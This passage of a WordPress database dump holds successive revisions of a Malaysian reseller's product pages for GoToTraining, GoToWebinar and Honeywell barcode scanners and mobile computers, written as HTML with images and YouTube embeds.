allowfullscreen=\"allowfullscreen\"></iframe></div>\r\n&nbsp;\r\n\r\n</div>\r\n</div>\r\n</div>','GoToTraining','','inherit','closed','closed','','1634-revision-v1','','','2019-09-30 15:51:42','2019-09-30 07:51:42','',1634,'https://bintara.com.my/blog/2019/09/30/1634-revision-v1/',0,'revision','',0),(3578,1,'2019-09-30 15:53:57','2019-09-30 07:53:57','<h3 class=\"video-lightbox__text-title\">Let our tools amaze you â€” and your learners</h3>\r\n<p class=\"video-lightbox__text-description\">Whether youâ€™re new to training or a veteran, GoToTraining is the right software for training, virtually or in a hybrid situation. Keep your attendees involved with in-session collaboration, Breakout sessions for small groups, detailed analytics and more.</p>\r\n\r\n<h2 class=\"section-header__headline\">Understand your audience</h2>\r\n<img class=\"wp-image-2010 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/gototraining-1.jpg\" alt=\"\" width=\"586\" height=\"309\" />\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\"><strong>Custom Registration</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Capture key information, add expanded fields and learn about your customers with tailored questions.</div>\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\"><strong>RevStream Payment Processing</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Charge for your courses and manage your registrants\' payments and refunds through PayPal integration.</div>\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\"><strong>Content Sharing</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Set your students up for success in class with videos, Powerpoint presentations and course catalogs.</div>\r\n&nbsp;\r\n<h2 class=\"section-header__headline\">Keep your learners engaged</h2>\r\n<img class=\"wp-image-2011 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/gototraining-2.jpg\" alt=\"\" width=\"669\" height=\"259\" />\r\n<ul>\r\n 	<li><strong>Test and Polls</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Use tests to evaluate knowledge retention during the session and get immediate feedback with polls.</div>\r\n<div class=\"icon-text__item align-center \">\r\n<ul>\r\n 	<li><strong>Student Engagement</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Boost knowledge retention with in-session Activities. Encourage small-group interaction with Breakouts.</div>\r\n<div class=\"icon-text__item align-center \">\r\n<ul>\r\n 	<li><strong>Whiteboard Sharing</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Broadcast an image of your whiteboard to attendees and share your updates in real time.</div>\r\n&nbsp;\r\n<h2 class=\"section-header__headline\">See what your audience have learned</h2>\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\"><strong>Reporting</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Get detailed reports on session attendance, test results and evaluations.</div>\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\"><strong>Certificates of Completion</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">\r\n\r\nSend emails after your class and reward your attendees when they finish.\r\n<ul>\r\n 	<li><strong>Recording</strong></li>\r\n</ul>\r\nRecord your training and upload to the cloud for viewing on any device.\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n&nbsp;\r\n<div><iframe src=\"https://www.youtube.com/embed/aaSQsIokgps\" width=\"800\" height=\"450\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe></div>\r\n&nbsp;\r\n\r\n</div>\r\n</div>\r\n</div>','GoToTraining','','inherit','closed','closed','','1634-revision-v1','','','2019-09-30 15:53:57','2019-09-30 07:53:57','',1634,'https://bintara.com.my/blog/2019/09/30/1634-revision-v1/',0,'revision','',0),(3577,1,'2019-09-30 15:53:05','2019-09-30 07:53:05','<h3 class=\"video-lightbox__text-title\">Let our tools amaze you â€” and your learners</h3>\r\n<p class=\"video-lightbox__text-description\">Whether youâ€™re new to training or a veteran, GoToTraining is the right software for training, virtually or in a hybrid situation. Keep your attendees involved with in-session collaboration, Breakout sessions for small groups, detailed analytics and more.</p>\r\n\r\n<h2 class=\"section-header__headline\">Understand your audience</h2>\r\n<img class=\"wp-image-2010 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/gototraining-1.jpg\" alt=\"\" width=\"586\" height=\"309\" />\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\"><strong>Custom Registration</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Capture key information, add expanded fields and learn about your customers with tailored questions.</div>\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\"><strong>RevStream Payment Processing</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Charge for your courses and manage your registrants\' payments and refunds through PayPal integration.</div>\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\"><strong>Content Sharing</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Set your students up for success in class with videos, Powerpoint presentations and course catalogs.</div>\r\n&nbsp;\r\n<h2 class=\"section-header__headline\">Keep your learners engaged</h2>\r\n<img class=\"wp-image-2011 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/gototraining-2.jpg\" alt=\"\" width=\"669\" height=\"259\" />\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\"><strong>Test and Polls</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Use tests to evaluate knowledge retention during the session and get immediate feedback with polls.</div>\r\n<div class=\"icon-text__item align-center \">\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\"><strong>Student Engagement</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Boost knowledge retention with in-session Activities. Encourage small-group interaction with Breakouts.</div>\r\n<div class=\"icon-text__item align-center \">\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\"><strong>Whiteboard Sharing</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Broadcast an image of your whiteboard to attendees and share your updates in real time.</div>\r\n&nbsp;\r\n<h2 class=\"section-header__headline\">See what your audience have learned</h2>\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\"><strong>Reporting</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Get detailed reports on session attendance, test results and evaluations.</div>\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\"><strong>Certificates of Completion</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">\r\n\r\nSend emails after your class and reward your attendees when they finish.\r\n<ul>\r\n 	<li><strong>Recording</strong></li>\r\n</ul>\r\nRecord your training and upload to the cloud for viewing on any device.\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n&nbsp;\r\n<div><iframe src=\"https://www.youtube.com/embed/aaSQsIokgps\" width=\"800\" height=\"450\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe></div>\r\n&nbsp;\r\n\r\n</div>\r\n</div>\r\n</div>','GoToTraining','','inherit','closed','closed','','1634-revision-v1','','','2019-09-30 15:53:05','2019-09-30 07:53:05','',1634,'https://bintara.com.my/blog/2019/09/30/1634-revision-v1/',0,'revision','',0),(3581,1,'2019-09-30 16:08:03','2019-09-30 08:08:03','<h3 class=\"video-lightbox__text-title\">Let our tools amaze you â€” and your learners</h3>\r\n<p class=\"video-lightbox__text-description\">Whether youâ€™re new to training or a veteran, GoToTraining is the right software for training, virtually or in a hybrid situation. Keep your attendees involved with in-session collaboration, Breakout sessions for small groups, detailed analytics and more.</p>\r\n\r\n<h2 class=\"section-header__headline\">Understand your audience</h2>\r\n<img class=\"wp-image-2010 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/gototraining-1.jpg\" alt=\"\" width=\"586\" height=\"309\" />\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\"><strong>Custom Registration</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Capture key information, add expanded fields and learn about your customers with tailored questions.</div>\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\"><strong>RevStream Payment Processing</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Charge for your courses and manage your registrants\' payments and refunds through PayPal integration.</div>\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\"><strong>Content Sharing</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Set your students up for success in class with videos, Powerpoint presentations and course catalogs.</div>\r\n<h2 class=\"section-header__headline\">Keep your learners engaged</h2>\r\n<img class=\"wp-image-2011 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/gototraining-2.jpg\" alt=\"\" width=\"669\" height=\"259\" />\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\"><strong>Test and Polls</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Use tests to evaluate knowledge retention during the session and get immediate feedback with polls.</div>\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\"><strong>Student Engagement</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Boost knowledge retention with in-session Activities. Encourage small-group interaction with Breakouts.</div>\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\"><strong>Whiteboard Sharing</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Broadcast an image of your whiteboard to attendees and share your updates in real time.</div>\r\n<h2 class=\"section-header__headline\">See what your audience have learned</h2>\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\"><strong>Reporting</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Get detailed reports on session attendance, test results and evaluations.</div>\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\"><strong>Certificates of Completion</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">\r\n\r\nSend emails after your class and reward your attendees when they finish.\r\n<ul>\r\n 	<li><strong>Recording</strong></li>\r\n</ul>\r\nRecord your training and upload to the cloud for viewing on any device.\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n&nbsp;\r\n<div><iframe src=\"https://www.youtube.com/embed/aaSQsIokgps\" width=\"800\" height=\"450\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe></div>\r\n&nbsp;\r\n\r\n</div>\r\n</div>\r\n</div>','GoToTraining','','inherit','closed','closed','','1634-revision-v1','','','2019-09-30 16:08:03','2019-09-30 08:08:03','',1634,'https://bintara.com.my/blog/2019/09/30/1634-revision-v1/',0,'revision','',0),(3582,1,'2019-09-30 16:09:04','2019-09-30 08:09:04','<h3 class=\"video-lightbox__text-title\">Let our tools amaze you â€” and your learners</h3>\r\n<p class=\"video-lightbox__text-description\">Whether youâ€™re new to training or a veteran, GoToTraining is the right software for training, virtually or in a hybrid situation. Keep your attendees involved with in-session collaboration, Breakout sessions for small groups, detailed analytics and more.</p>\r\n\r\n<h2 class=\"section-header__headline\">Understand your audience</h2>\r\n<img class=\"wp-image-2010 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/gototraining-1.jpg\" alt=\"\" width=\"586\" height=\"309\" />\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\"><strong>Custom Registration</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Capture key information, add expanded fields and learn about your customers with tailored questions.</div>\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\"><strong>RevStream Payment Processing</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Charge for your courses and manage your registrants\' payments and refunds through PayPal integration.</div>\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\"><strong>Content Sharing</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Set your students up for success in class with videos, Powerpoint presentations and course catalogs.</div>\r\n<h2 class=\"section-header__headline\">Keep your learners engaged</h2>\r\n<img class=\"wp-image-2011 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/gototraining-2.jpg\" alt=\"\" width=\"669\" height=\"259\" />\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\"><strong>Test and Polls</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Use tests to evaluate knowledge retention during the session and get immediate feedback with polls.</div>\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\"><strong>Student Engagement</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Boost knowledge retention with in-session Activities. Encourage small-group interaction with Breakouts.</div>\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\"><strong>Whiteboard Sharing</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Broadcast an image of your whiteboard to attendees and share your updates in real time.</div>\r\n<h2 class=\"section-header__headline\">See what your audience have learned</h2>\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\"><strong>Reporting</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Get detailed reports on session attendance, test results and evaluations.</div>\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\"><strong>Certificates of Completion</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Send emails after your class and reward your attendees when they finish.</div>\r\n<ul>\r\n 	<li><strong>Recording</strong></li>\r\n</ul>\r\nRecord your training and upload to the cloud for viewing on any device.\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n&nbsp;\r\n<div><iframe src=\"https://www.youtube.com/embed/aaSQsIokgps\" width=\"800\" height=\"450\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe></div>\r\n&nbsp;\r\n\r\n</div>\r\n</div>\r\n</div>','GoToTraining','','inherit','closed','closed','','1634-revision-v1','','','2019-09-30 16:09:04','2019-09-30 08:09:04','',1634,'https://bintara.com.my/blog/2019/09/30/1634-revision-v1/',0,'revision','',0),(3583,1,'2019-09-30 16:10:06','2019-09-30 08:10:06','<h3 class=\"video-lightbox__text-title\">Let our tools amaze you â€” and your learners</h3>\r\n<p class=\"video-lightbox__text-description\">Whether youâ€™re new to training or a veteran, GoToTraining is the right software for training, virtually or in a hybrid situation. Keep your attendees involved with in-session collaboration, Breakout sessions for small groups, detailed analytics and more.</p>\r\n\r\n<h2 class=\"section-header__headline\">Understand your audience</h2>\r\n<img class=\"wp-image-2010 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/gototraining-1.jpg\" alt=\"\" width=\"586\" height=\"309\" />\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\"><strong>Custom Registration</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Capture key information, add expanded fields and learn about your customers with tailored questions.</div>\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\"><strong>RevStream Payment Processing</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Charge for your courses and manage your registrants\' payments and refunds through PayPal integration.</div>\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\"><strong>Content Sharing</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Set your students up for success in class with videos, Powerpoint presentations and course catalogs.</div>\r\n<h2></h2>\r\n<h2 class=\"section-header__headline\">Keep your learners engaged</h2>\r\n<img class=\"wp-image-2011 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/gototraining-2.jpg\" alt=\"\" width=\"669\" height=\"259\" />\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\"><strong>Test and Polls</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Use tests to evaluate knowledge retention during the session and get immediate feedback with polls.</div>\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\"><strong>Student Engagement</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Boost knowledge retention with in-session Activities. Encourage small-group interaction with Breakouts.</div>\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\"><strong>Whiteboard Sharing</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Broadcast an image of your whiteboard to attendees and share your updates in real time.</div>\r\n<h2></h2>\r\n<h2 class=\"section-header__headline\">See what your audience have learned</h2>\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\"><strong>Reporting</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Get detailed reports on session attendance, test results and evaluations.</div>\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\"><strong>Certificates of Completion</strong></li>\r\n</ul>\r\n<div class=\"icon-text__body\">Send emails after your class and reward your attendees when they finish.</div>\r\n<ul>\r\n 	<li><strong>Recording</strong></li>\r\n</ul>\r\nRecord your training and upload to the cloud for viewing on any device.\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n&nbsp;\r\n<div><iframe src=\"https://www.youtube.com/embed/aaSQsIokgps\" width=\"800\" height=\"450\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe></div>\r\n&nbsp;','GoToTraining','','inherit','closed','closed','','1634-revision-v1','','','2019-09-30 16:10:06','2019-09-30 08:10:06','',1634,'https://bintara.com.my/blog/2019/09/30/1634-revision-v1/',0,'revision','',0),(3584,1,'2019-09-30 16:12:15','2019-09-30 08:12:15','<h3 class=\"video-lightbox__text-title\">Let our tools amaze you â€” and your learners</h3>\r\n<p class=\"video-lightbox__text-description\">Whether youâ€™re new to training or a veteran, GoToTraining is the right software for training, virtually or in a hybrid situation. Keep your attendees involved with in-session collaboration, Breakout sessions for small groups, detailed analytics and more.</p>\r\n\r\n<h2 class=\"section-header__headline\">Understand your audience</h2>\r\n<img class=\"wp-image-2010 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/gototraining-1.jpg\" alt=\"\" width=\"586\" height=\"309\" />\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\">\r\n<h4><strong>Custom Registration</strong></h4>\r\n</li>\r\n</ul>\r\n<div class=\"icon-text__body\">Capture key information, add expanded fields and learn about your customers with tailored questions.</div>\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\">\r\n<h4><strong>RevStream Payment Processing</strong></h4>\r\n</li>\r\n</ul>\r\n<div class=\"icon-text__body\">Charge for your courses and manage your registrants\' payments and refunds through PayPal integration.</div>\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\">\r\n<h4><strong>Content Sharing</strong></h4>\r\n</li>\r\n</ul>\r\n<div class=\"icon-text__body\">Set your students up for success in class with videos, Powerpoint presentations and course catalogs.</div>\r\n&nbsp;\r\n<h2 class=\"section-header__headline\">Keep your learners engaged</h2>\r\n<img class=\"wp-image-2011 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/gototraining-2.jpg\" alt=\"\" width=\"669\" height=\"259\" />\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\">\r\n<h4><strong>Test and Polls</strong></h4>\r\n</li>\r\n</ul>\r\n<div class=\"icon-text__body\">Use tests to evaluate knowledge retention during the session and get immediate feedback with polls.</div>\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\">\r\n<h4><strong>Student Engagement</strong></h4>\r\n</li>\r\n</ul>\r\n<div class=\"icon-text__body\">Boost knowledge retention with in-session Activities. Encourage small-group interaction with Breakouts.</div>\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\">\r\n<h4><strong>Whiteboard Sharing</strong></h4>\r\n</li>\r\n</ul>\r\n<div class=\"icon-text__body\">Broadcast an image of your whiteboard to attendees and share your updates in real time.</div>\r\n&nbsp;\r\n<h2 class=\"section-header__headline\">See what your audience have learned</h2>\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\">\r\n<h4><strong>Reporting</strong></h4>\r\n</li>\r\n</ul>\r\n<div class=\"icon-text__body\">Get detailed reports on session attendance, test results and evaluations.</div>\r\n<ul>\r\n 	<li class=\"icon-text__title arrow\">\r\n<h4><strong>Certificates of Completion</strong></h4>\r\n</li>\r\n</ul>\r\n<div class=\"icon-text__body\">Send emails after your class and reward your attendees when they finish.</div>\r\n<ul>\r\n 	<li>\r\n<h4><strong>Recording</strong></h4>\r\n</li>\r\n</ul>\r\nRecord your training and upload to the cloud for viewing on any device.\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n&nbsp;\r\n<div><iframe src=\"https://www.youtube.com/embed/aaSQsIokgps\" width=\"800\" height=\"450\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe></div>\r\n&nbsp;','GoToTraining','','inherit','closed','closed','','1634-revision-v1','','','2019-09-30 16:12:15','2019-09-30 08:12:15','',1634,'https://bintara.com.my/blog/2019/09/30/1634-revision-v1/',0,'revision','',0),(3585,1,'2019-09-30 16:28:11','2019-09-30 08:28:11','<h3 class=\"section-header__subheadline\">Our easy-to-use technology allows you to actually have fun presenting. And our fully interactive features ensure you keep attendees glued to their screen.</h3>\r\nGoToWebinar erases the headache and hassle from webinars. No matter your goal or skill level, youâ€™ll quickly see why so many love GoToWebinar. Go from preparing a webinar to presenting in fewer steps â€“ and have a lot of fun along the way.\r\n\r\n<img class=\" wp-image-1977 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/gotowebinar.png\" alt=\"\" width=\"434\" height=\"298\" />\r\n<div class=\"check-and-text__stacked\">\r\n<ul>\r\n 	<li class=\"check-and-text__title\"><strong>Engagement Dashboard</strong> -- Keep an eye on attentiveness, hands raised and time elapsed.</li>\r\n</ul>\r\n</div>\r\n<div class=\"check-and-text__stacked\">\r\n<ul>\r\n 	<li class=\"check-and-text__title\"><strong>Presenter Webcams</strong> -- Show off your bright smile and invite panelists to do the same.</li>\r\n</ul>\r\n</div>\r\n<div class=\"check-and-text__stacked\">\r\n<ul>\r\n 	<li class=\"check-and-text__title\"><strong>Polls &amp; Surveys</strong> -- Engage your audience with slide-in questions and live results.</li>\r\n</ul>\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>\r\n&nbsp;\r\n\r\n<iframe src=\"https://www.youtube.com/embed/uDdg_Z2KzHs\" width=\"800\" height=\"450\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe>\r\n\r\n&nbsp;\r\n\r\n</div>','GoToWebinar','','inherit','closed','closed','','1633-revision-v1','','','2019-09-30 16:28:11','2019-09-30 08:28:11','',1633,'https://bintara.com.my/blog/2019/09/30/1633-revision-v1/',0,'revision','',0),(3588,1,'2019-09-30 17:00:25','2019-09-30 09:00:25','Our company invents and manufactures technologies that address some of the worldâ€™s most critical challenges around energy, safety, security, productivity and global urbanization. We are uniquely positioned to blend physical products with software to support connected systems that improve buildings, factories, utilities, and aircraft, and that enable a safer, more comfortable and more productive world. Our solutions enhance the quality of life of people around the globe and create new markets and even new industries.\r\n\r\nHoneywellâ€™s solutions enhance productivity and safety for more than half a billion workers annually. Our productivity solutions include a mix of products, from rugged mobile computers, voice-enabled software and workflows, bar code scanners, and printing solutions.\r\n<h2>Productivity</h2>\r\n\r\n<table border=\"1\" cellpadding=\"10\">\r\n  <tbody>\r\n    <tr align=\"center\">\r\n      <td colspan=\"2\"><h4>Scanning</h4></td>\r\n    </tr>\r\n    <tr>\r\n      <td width=\"20%\"><img class=\"wp-image-2051 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/scanning.jpg\" alt=\"\"/></td>\r\n      <td>From retail checkout to patient care to warehouse management, Honeywell barcode scanners are built to meet your demands.</td>\r\n    </tr>\r\n  </tbody>\r\n</table>','Honeywell','','inherit','closed','closed','','2048-revision-v1','','','2019-09-30 17:00:25','2019-09-30 09:00:25','',2048,'https://bintara.com.my/blog/2019/09/30/2048-revision-v1/',0,'revision','',0),(3589,1,'2019-09-30 17:01:15','2019-09-30 09:01:15','Our company invents and manufactures technologies that address some of the worldâ€™s most critical challenges around energy, safety, security, productivity and global urbanization. We are uniquely positioned to blend physical products with software to support connected systems that improve buildings, factories, utilities, and aircraft, and that enable a safer, more comfortable and more productive world. Our solutions enhance the quality of life of people around the globe and create new markets and even new industries.\r\n\r\nHoneywellâ€™s solutions enhance productivity and safety for more than half a billion workers annually. Our productivity solutions include a mix of products, from rugged mobile computers, voice-enabled software and workflows, bar code scanners, and printing solutions.\r\n<h2>Productivity</h2>\r\n\r\n<table border=\"0\" cellpadding=\"10\">\r\n  <tbody>\r\n    <tr align=\"center\">\r\n      <td colspan=\"2\"><h3>Scanning</h3></td>\r\n    </tr>\r\n    <tr>\r\n      <td width=\"20%\"><img class=\"wp-image-2051 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/scanning.jpg\" alt=\"\"/></td>\r\n      <td>From retail checkout to patient care to warehouse management, Honeywell barcode scanners are built to meet your demands.</td>\r\n    </tr>\r\n  </tbody>\r\n</table>','Honeywell','','inherit','closed','closed','','2048-revision-v1','','','2019-09-30 17:01:15','2019-09-30 09:01:15','',2048,'https://bintara.com.my/blog/2019/09/30/2048-revision-v1/',0,'revision','',0),(3590,1,'2019-09-30 17:02:09','2019-09-30 09:02:09','Our company invents and manufactures technologies that address some of the worldâ€™s most critical challenges around energy, safety, security, productivity and global urbanization. We are uniquely positioned to blend physical products with software to support connected systems that improve buildings, factories, utilities, and aircraft, and that enable a safer, more comfortable and more productive world. Our solutions enhance the quality of life of people around the globe and create new markets and even new industries.\r\n\r\nHoneywellâ€™s solutions enhance productivity and safety for more than half a billion workers annually. Our productivity solutions include a mix of products, from rugged mobile computers, voice-enabled software and workflows, bar code scanners, and printing solutions.\r\n<h2>Productivity</h2>\r\n\r\n<table border=\"0\" cellpadding=\"100\">\r\n  <tbody>\r\n    <tr align=\"center\">\r\n      <td colspan=\"2\"><h3>Scanning</h3></td>\r\n    </tr>\r\n    <tr>\r\n      <td width=\"20%\"><img class=\"wp-image-2051 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/scanning.jpg\" alt=\"\"/></td>\r\n      <td>From retail checkout to patient care to warehouse management, Honeywell barcode scanners are built to meet your demands.</td>\r\n    </tr>\r\n  </tbody>\r\n</table>','Honeywell','','inherit','closed','closed','','2048-revision-v1','','','2019-09-30 17:02:09','2019-09-30 09:02:09','',2048,'https://bintara.com.my/blog/2019/09/30/2048-revision-v1/',0,'revision','',0),(3591,1,'2019-09-30 17:02:41','2019-09-30 09:02:41','Our company invents and manufactures technologies that address some of the worldâ€™s most critical challenges around energy, safety, security, productivity and global urbanization. We are uniquely positioned to blend physical products with software to support connected systems that improve buildings, factories, utilities, and aircraft, and that enable a safer, more comfortable and more productive world. Our solutions enhance the quality of life of people around the globe and create new markets and even new industries.\r\n\r\nHoneywellâ€™s solutions enhance productivity and safety for more than half a billion workers annually. Our productivity solutions include a mix of products, from rugged mobile computers, voice-enabled software and workflows, bar code scanners, and printing solutions.\r\n<h2>Productivity</h2>\r\n\r\n<table border=\"0\" cellpadding=\"10\" cellspacing=\"10\">\r\n  <tbody>\r\n    <tr align=\"center\">\r\n      <td colspan=\"2\"><h3>Scanning</h3></td>\r\n    </tr>\r\n    <tr>\r\n      <td width=\"20%\"><img class=\"wp-image-2051 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/scanning.jpg\" alt=\"\"/></td>\r\n      <td>From retail checkout to patient care to warehouse management, Honeywell barcode scanners are built to meet your demands.</td>\r\n    </tr>\r\n  </tbody>\r\n</table>','Honeywell','','inherit','closed','closed','','2048-revision-v1','','','2019-09-30 17:02:41','2019-09-30 09:02:41','',2048,'https://bintara.com.my/blog/2019/09/30/2048-revision-v1/',0,'revision','',0),(3592,1,'2019-09-30 17:04:31','2019-09-30 09:04:31','Our company invents and manufactures technologies that address some of the worldâ€™s most critical challenges around energy, safety, security, productivity and global urbanization. We are uniquely positioned to blend physical products with software to support connected systems that improve buildings, factories, utilities, and aircraft, and that enable a safer, more comfortable and more productive world. Our solutions enhance the quality of life of people around the globe and create new markets and even new industries.\n\nHoneywellâ€™s solutions enhance productivity and safety for more than half a billion workers annually. Our productivity solutions include a mix of products, from rugged mobile computers, voice-enabled software and workflows, bar code scanners, and printing solutions.\n<h2>Productivity</h2>\n\n<table>\n  <tbody>\n    <tr align=\"center\">\n      <td colspan=\"2\"><h3>Scanning</h3></td>\n    </tr>\n    <tr>\n      <td width=\"20%\"><img class=\"wp-image-2051 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/scanning.jpg\" alt=\"\"/></td>\n      <td>From retail checkout to patient care to warehouse management, Honeywell barcode scanners are built to meet your demands.</td>\n    </tr>\n  </tbody>\n</table>','Honeywell','','inherit','closed','closed','','2048-autosave-v1','','','2019-09-30 17:04:31','2019-09-30 09:04:31','',2048,'https://bintara.com.my/blog/2019/09/30/2048-autosave-v1/',0,'revision','',0),(3593,1,'2019-09-30 17:04:34','2019-09-30 09:04:34','Our company invents and manufactures technologies that address some of the worldâ€™s most critical challenges around energy, safety, security, productivity and global urbanization. We are uniquely positioned to blend physical products with software to support connected systems that improve buildings, factories, utilities, and aircraft, and that enable a safer, more comfortable and more productive world. Our solutions enhance the quality of life of people around the globe and create new markets and even new industries.\r\n\r\nHoneywellâ€™s solutions enhance productivity and safety for more than half a billion workers annually. Our productivity solutions include a mix of products, from rugged mobile computers, voice-enabled software and workflows, bar code scanners, and printing solutions.\r\n<h2>Productivity</h2>\r\n\r\n<table>\r\n  <tbody>\r\n    <tr align=\"center\">\r\n      <td colspan=\"2\"><h3>Scanning</h3></td>\r\n    </tr>\r\n    <tr>\r\n      <td width=\"20%\"><img class=\"wp-image-2051 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/scanning.jpg\" alt=\"\"/></td>\r\n      <td>From retail checkout to patient care to warehouse management, Honeywell barcode scanners are built to meet your demands.</td>\r\n    </tr>\r\n  </tbody>\r\n</table>\r\n\r\n<table>\r\n  <tbody>\r\n    <tr align=\"center\">\r\n      <td colspan=\"2\"><h3>Computer Device</h3></td>\r\n    </tr>\r\n    <tr>\r\n      <td>Honeywell offers a broad array of durable mobile computers designed to improve the productivity of mobile workers.</td>\r\n      <td width=\"20%\"><img class=\" wp-image-2049 alignnone\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/comp-device.jpg\" alt=\"\" width=\"186\" height=\"186\" /></td>\r\n    </tr>\r\n  </tbody>\r\n</table>','Honeywell','','inherit','closed','closed','','2048-revision-v1','','','2019-09-30 17:04:34','2019-09-30 